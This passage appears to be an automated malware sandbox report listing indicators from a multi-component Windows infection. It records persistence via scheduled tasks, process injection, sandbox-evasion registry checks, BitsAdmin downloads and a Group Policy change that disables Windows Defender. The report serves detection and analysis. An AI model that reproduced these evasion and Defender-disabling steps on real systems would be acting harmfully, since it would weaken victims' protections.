C:\Windows\System32\Tasks\Firefox Default Browser Agent 7451613952F15FA8 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
Processes:
520258.exe7540508.execewNSWFaXogGyGjuphJS2DKK.exe6Dc4QkJcH_bc6k4XPPf58CgI.exeROKEqOhVK1b69uHCUbon1CXS.exe3258372.exeemLR1yBnJXWqQ4WeiAVEpVDR.exe8t8B84uCRSWE3mwZuTRWxKhE.exe8308170.exelierne.exepid process 4380 520258.exe 4636 7540508.exe 5168 cewNSWFaXogGyGjuphJS2DKK.exe 5276 6Dc4QkJcH_bc6k4XPPf58CgI.exe 5352 ROKEqOhVK1b69uHCUbon1CXS.exe 5636 3258372.exe 5900 emLR1yBnJXWqQ4WeiAVEpVDR.exe 5292 8t8B84uCRSWE3mwZuTRWxKhE.exe 6024 8308170.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe 7040 lierne.exe -
Suspicious use of SetThreadContext 13 IoCs
Processes:
Chrome5.exeMon1727c156c4abcec.exeMon1708beae021a5ff.exepQnAbYmg3ChB2IJbQyaavv5U.exeUDl5MrZhovzJ9aalPEClXxwq.exeBRFaifqDEarEZCox1Bk4206c.exexR3OQ2Qh_z7R_Ve5A7amjTnU.exewXD3LoKOrGHMg2o92T34f5b0.execscript.exesvchost.exelierne.execonhost.exedescription pid process target process PID 1560 set thread context of 1164 1560 Chrome5.exe Mon174a6c5f1664f.exe PID 2104 set thread context of 2420 2104 Mon1727c156c4abcec.exe Mon1727c156c4abcec.exe PID 1652 set thread context of 4424 1652 Mon1708beae021a5ff.exe mspaint.exe PID 5200 set thread context of 2580 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe Explorer.EXE PID 5284 set thread context of 5512 5284 UDl5MrZhovzJ9aalPEClXxwq.exe AppLaunch.exe PID 5376 set thread context of 2580 5376 BRFaifqDEarEZCox1Bk4206c.exe Explorer.EXE PID 5184 set thread context of 3456 5184 xR3OQ2Qh_z7R_Ve5A7amjTnU.exe xR3OQ2Qh_z7R_Ve5A7amjTnU.exe PID 1240 set thread context of 5616 1240 wXD3LoKOrGHMg2o92T34f5b0.exe wXD3LoKOrGHMg2o92T34f5b0.exe PID 6072 set thread context of 2580 6072 cscript.exe Explorer.EXE PID 2736 set thread context of 5300 2736 svchost.exe svchost.exe PID 7040 set thread context of 5912 7040 lierne.exe regsvcs.exe PID 9076 set thread context of 4804 9076 conhost.exe explorer.exe PID 6072 set thread context of 4804 6072 cscript.exe explorer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exerundll32.exeMicrosoftEdgeCP.exelighteningplayer-cache-gen.exeAAsjqRognrs5OHbgENK9auj7.exedescription ioc process File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\IuWtIecd\cache.dat rundll32.exe File created C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\IuWtIecd.dll MicrosoftEdgeCP.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\plugins.dat.7916 lighteningplayer-cache-gen.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe AAsjqRognrs5OHbgENK9auj7.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe -
Drops file in Windows directory 64 IoCs
Processes:
msiexec.exeMicrosoftEdge.exeMicrosoftEdge.exemsiexec.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process File opened for modification C:\Windows\Installer\MSI9218.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI51A0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8D60.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI53B4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7B97.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI92E5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE0B5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9EF5.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI79D1.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\f7bc874.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI9C42.tmp msiexec.exe File created C:\Windows\Installer\f7bc877.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI5442.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E2C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4CEC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI54FE.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI91D9.tmp msiexec.exe File created C:\Windows\Installer\f7bc874.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI9B25.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIDFCA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8EC9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI916B.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI9296.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI8B9A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDAF5.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI7839.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI86B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9050.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8FB4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI99EB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9CA1.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI9C12.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI9B64.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI7944.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7C55.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI90EE.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4288 1520 WerFault.exe Mon17bffc2992eb3d.exe 4816 1652 WerFault.exe Mon1708beae021a5ff.exe 5068 1520 WerFault.exe Mon17bffc2992eb3d.exe 4828 1520 WerFault.exe Mon17bffc2992eb3d.exe 4672 1520 WerFault.exe Mon17bffc2992eb3d.exe 4580 1520 WerFault.exe Mon17bffc2992eb3d.exe 5980 1520 WerFault.exe Mon17bffc2992eb3d.exe 4872 2392 WerFault.exe setup.exe 4892 1520 WerFault.exe Mon17bffc2992eb3d.exe 4496 5284 WerFault.exe UDl5MrZhovzJ9aalPEClXxwq.exe 3896 2392 WerFault.exe setup.exe 7028 2392 WerFault.exe setup.exe 4484 2392 WerFault.exe setup.exe 4996 5192 WerFault.exe 7lIFfIAq75ayPS1l79AzqZbx.exe 6380 5656 WerFault.exe wZ_PDkNwiqJyya1LBzC0Oydj.exe 3344 5656 WerFault.exe wZ_PDkNwiqJyya1LBzC0Oydj.exe 5540 2392 WerFault.exe setup.exe -
Checks SCSI registry key(s) 3 TTPs 33 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
jxI5xrUu3jnl7Xc0smG8sEXe.exeMon17a0d8ec302e.exeZz_Kz0VjFFF_1CMdwOqI2jwN.exebwgirdwbwgirdwbwgirdwbwgirdwbwgirdwbwgirdwbwgirdwdescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jxI5xrUu3jnl7Xc0smG8sEXe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Zz_Kz0VjFFF_1CMdwOqI2jwN.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Zz_Kz0VjFFF_1CMdwOqI2jwN.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jxI5xrUu3jnl7Xc0smG8sEXe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jxI5xrUu3jnl7Xc0smG8sEXe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Zz_Kz0VjFFF_1CMdwOqI2jwN.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bwgirdw -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5592 schtasks.exe 7364 schtasks.exe 7356 schtasks.exe 7260 schtasks.exe 7224 schtasks.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Kills process with taskkill 12 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 7208 taskkill.exe 7264 taskkill.exe 4388 taskkill.exe 8140 taskkill.exe 5600 taskkill.exe 5592 taskkill.exe 4512 taskkill.exe 5368 taskkill.exe 4900 taskkill.exe 8908 taskkill.exe 4916 taskkill.exe 6364 taskkill.exe -
Processes:
browser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exebrowser_broker.exebrowser_broker.execscript.exeMicrosoftEdge.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \Registry\User\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cscript.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
rundll32.exesvchost.exerundll32.exemsiexec.exemsiexec.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18\52C64B7E rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}User rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\17\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}User rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8F070282-F23C-45AC-A207-9BC0C2B4CB41}Machine\SOFTWARE rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A8CDDE19-3402-437B-BB7D-049970CEB656}Machine\SOFTWARE\Policies\Microsoft\Windows Defender rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122 = "Windows Firewall" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122 = "Windows Firewall" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy 